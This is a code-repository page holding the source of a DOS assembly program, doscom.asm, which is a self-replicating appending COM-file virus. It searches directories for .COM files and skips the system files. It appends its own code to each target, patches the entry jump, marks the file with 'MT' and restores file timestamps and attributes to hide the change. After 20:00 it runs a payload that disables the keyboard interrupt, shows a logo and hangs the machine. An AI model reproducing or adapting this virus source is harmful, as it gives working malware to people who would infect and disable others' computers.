-
Notifications
You must be signed in to change notification settings - Fork 0
/
doscom.asm
359 lines (268 loc) · 9.32 KB
/
doscom.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
; ***************************************************************************
; * written by cod in 1999/2000 ?
; ***************************************************************************
.MODEL TINY
.CODE
ORG 100h
start: CALL get_disp
get_disp: MOV AX, SS
MOV ES, AX
MOV BX, SP
MOV AX, WORD PTR [ ES : BX ]
MOV BP, AX
MOV AX, CS
MOV ES, AX
XOR BX, BX
SUB SP, 2
SUB BP, OFFSET get_disp
check_if_destruct: MOV AH, 02Ch
INT 21h
CMP CH, 20
JE destruct
CMP CH, 20
JNB destruct
LEA DI, [ BP + save_path ]
JMP DI
destruct: LEA DI, [ BP + happy_month ]
JMP DI
save_path: MOV AH, 47h
XOR DL, DL
LEA SI, [ BP + org_path ]
INT 21h
get_dta: MOV AH, 2Fh
INT 21h
MOV [ BP + old_dta_off ], BX
set_dta: MOV AH, 1Ah
LEA DX, [ BP + dta_filler ]
INT 21h
search: ; Ricerca di un file
find_first: MOV AH, 4Eh
MOV CX, [ BP + search_attrib ]
LEA DX, [ BP + search_mask ]
INT 21h
JNC clear_attrib
find_next: MOV AH, 4Fh
INT 21h
JNC clear_attrib
still_searching: MOV AH, 3Bh
LEA DX, [ BP + previous_dir ]
INT 21h
JNC search
LEA DI, [ BP + bomb ]
JMP DI
clear_attrib: MOV AX, 4301h
XOR CX, CX
LEA DX, [ BP + dta_file_name ]
INT 21h
XCHG BX, AX
check_if_not_infected:
CLD
LEA DI, [ BP + command_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 11
REPE CMPSB
JE go_next
LEA DI, [ BP + ibmbio_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 10
REPE CMPSB
JE go_next
LEA DI, [ BP + ibmdos_com ]
LEA SI, [ BP + dta_file_name ]
MOV CX, 10
REPE CMPSB
JNE check_if_infected
go_next: LEA DI, [ BP + close_file ]
JMP DI
check_if_infected: PUSH AX
PUSH BX
MOV AX, 3D02h
LEA DX, [ BP + dta_file_name ]
INT 21h
JNC opened
POP BX
POP AX
MOV DI, BP
LEA DI, [ BP + close_file ]
JMP DI
opened: MOV WORD PTR [ BP + handle_of_file ], AX
POP BX
POP AX
XOR CX, CX
XOR DX, DX
MOV AX, 4200h
MOV BX, WORD PTR [ BP + handle_of_file ]
INT 21h
MOV AH, 3Fh
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0002h
LEA DX, [ BP + last_chars ]
INT 21h
MOV AX, WORD PTR [ BP + last_chars ]
CMP AX, WORD PTR [ BP + exe_id ]
JE go_to_next
JMP com_valid
go_to_next: LEA DI, [ BP + restore_date_time ]
JMP DI
com_valid: MOV DX, WORD PTR [ BP + dta_file_size ]
SUB DX, 2
MOV AX, 4200h
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0000h
INT 21h
MOV AH, 3Fh
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0002h
LEA DX, [ BP + last_chars ]
INT 21h
MOV AH, [ BP + last_chars ]
CMP AH, [ BP + virus_id ]
JNE save_3_bytes
MOV AH, [ BP + last_chars + 1 ]
CMP AH, [ BP + virus_id + 1 ]
JNE save_3_bytes
LEA DI, [ BP + close_file ]
JMP DI
save_3_bytes: MOV AX, 4200h
XOR CX, CX
XOR DX, DX
INT 21h
MOV AH, 3Fh
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0003h
LEA DX, [ BP + _3_bytes ]
INT 21h
goto_eof: MOV AX, 4202h
MOV BX, WORD PTR [ BP + handle_of_file ]
XOR CX, CX
XOR DX, DX
INT 21h
save_jmp_displacement:
SUB AX, 0003h
MOV [ BP + jmp_disp ], AX
write_code: MOV AH, 40h
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, virus_length
LEA DX, [ BP + start ]
INT 21h
goto_baf: MOV AX, 4200h
MOV BX, WORD PTR [ BP + handle_of_file ]
XOR CX, CX
XOR DX, DX
INT 21h
write_jmp: MOV AH, 40h
MOV BX, WORD PTR [ BP + handle_of_file ]
MOV CX, 0003h
LEA DX, [ BP + jmp_code ]
INT 21h
INC [ BP + infections ]
restore_date_time: MOV AX, 5701h
MOV CX, [ BP + dta_file_time ]
MOV DX, [ BP + dta_file_date ]
INT 21h
close_file: MOV AH, 3Eh
MOV BX, [ BP + handle_of_file ]
INT 21h
restore_attrib: XOR CH, CH
MOV CL, [ BP + dta_file_attrib ]
MOV AX, 4301h
LEA DX, [ BP + dta_file_name ]
INT 21h
done_infecting?: MOV AH, [ BP + infections ]
CMP AH, [ BP + max_infections ]
JZ bomb
LEA DI, [ BP + find_next ]
JMP DI
return_control: MOV DI, 100h
JMP DI
bomb:
restore_path: MOV AH, 3Bh
LEA DX, [ BP + root ]
INT 21h
MOV AH, 3Bh
LEA DX, [ BP + org_path ]
INT 21h
restore_dta: MOV AH, 1Ah
MOV DX, [ BP + old_dta_off ]
INT 21h
restore_3_bytes: LEA SI, [ BP + _3_bytes ]
MOV DI, 100h
CLD
MOV CX, 0003h
REP MOVSB
return_control_or_exit:
CMP BP, 0000h
JE exit
LEA DI, [ BP + return_control ]
JMP DI
exit: MOV AX, 4C00h
INT 21h
happy_month: CMP [CS:is_encrypt], 00h
JE execute_now
execute_wait: MOV CX, bad_routine_length
MOV AX, CS
MOV ES, AX
LEA DI, [ BP + execute_now ]
repeat_loop: MOV AL, BYTE PTR [ ES : DI ]
SUB AL, [CS:is_encrypt]
INC DI
LOOP repeat_loop
execute_now: CLI
XOR AX, AX
MOV ES, AX
MOV BX, 09h * 4
LEA DI, [ BP + Lock_Int_09 ]
MOV DX, DI
ADD BX, 2
MOV [ ES : BX ], DX
SUB BX, 2
MOV DX, CS
MOV [ ES : BX ], DX
STI
MOV AX, CS
MOV DS, AX
MOV AX, 0003h
INT 10h
MOV AX, 0B800h
MOV ES, AX
XOR DI, DI
MOV AX, CS
MOV DS, AX
LEA SI, [ BP + logo ]
MOV CX, 20 * 8
REP MOVSW
current_location: NOP
JMP current_location
reset_cpu DB 0EAh, 0F0h, 0FFh, 00h, 0F0h
execute_stop: NOP
Lock_Int_09: IRET
old_dta_off DW ?
dta_filler DB 21 dup ( ? )
dta_file_attrib DB ?
dta_file_time DW ?
dta_file_date DW ?
dta_file_size DD ?
dta_file_name DB 13 dup ( ? )
is_encrypt DB ?
search_mask DB '*.COM', 0
search_attrib DW 00100111b
command_com DB 'COMMAND.COM'
ibmbio_com DB 'IBMBIO.COM'
ibmdos_com DB 'IBMDOS.COM'
previous_dir DB '..', 0
root DB '\', 0
org_path DB 64 DUP ( ? )
infections DB ?
max_infections DB 1
handle_of_file DW ?
logo Db 'ascii text encoded with text mode attributes.. 4 bit for color and 4 bit for background!$', 00h
_3_bytes DB 0, 0, 0
exe_id DB 'MZ'
jmp_code DB 0E9h
jmp_disp DW ?
last_chars DB 0, 0
virus_id DB 'MT'
EOV:
virus_length EQU OFFSET EOV - OFFSET start
bad_routine_length EQU OFFSET execute_now - OFFSET execute_stop
END start